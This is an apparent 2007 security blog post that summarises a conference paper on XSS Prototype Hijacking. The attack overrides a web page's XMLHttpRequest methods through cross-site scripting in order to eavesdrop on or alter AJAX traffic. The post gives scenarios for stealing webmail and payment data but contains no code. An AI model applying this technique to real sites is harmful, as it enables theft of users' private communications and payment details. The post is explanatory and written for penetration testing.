January 14, 2007

The Beauty and the Beast

The Chaos Computer Club (CCC) is a very well known European hacker team. And their last congress, that took place last December in Berlin, has provided us with a lot of interesting material that is worth viewing.

The paper that attracted me the most was one about AJAX, that could be previously found here (this one doesn't work now) and it is still available from here. The name of the paper was Subverting AJAX and is written by Stefano di Paola and Giorgio Fedon. They talk about a very powerful technique to attack an AJAX application that they call XSS Prototype Hijacking. Believe me, there is beauty in this attack.

Prototype Hijacking consists in overwriting the methods of the XMLHttpRequest object, that is the one that takes care of the asynchronous communications with the server, actually intercepting the calls to those methods and, thus, being able to do things such as reading all the private information before it is encrypted by the TLS layer or replacing the information that is send. This is new but the results are similar to the DLL injection: the attacker becomes a dangerous beast.

In order to overwrite the methods, they use Cross-Site Scripting (XSS) and even explain some advanced techniques to do so. The basic idea is quite simple though: you force the application to run the code that is needed to overwrite the methods.

This is quite powerful, let me give you a couple of examples where this attack could be used:
  • A webmail application that doesn't control the contents of each mail to filter out XSS attacks. With the overwritten methods every communication with server can be eavesdropped (that means having access to every mail received or sent).
  • An Internet shop, preferably one that allows its users to review the products. Payment information can be intercepted and used on line.
My recommendation: try this and keep it in your pentest toolbox.

Labels:

0 Comments:

Post a Comment

<< Home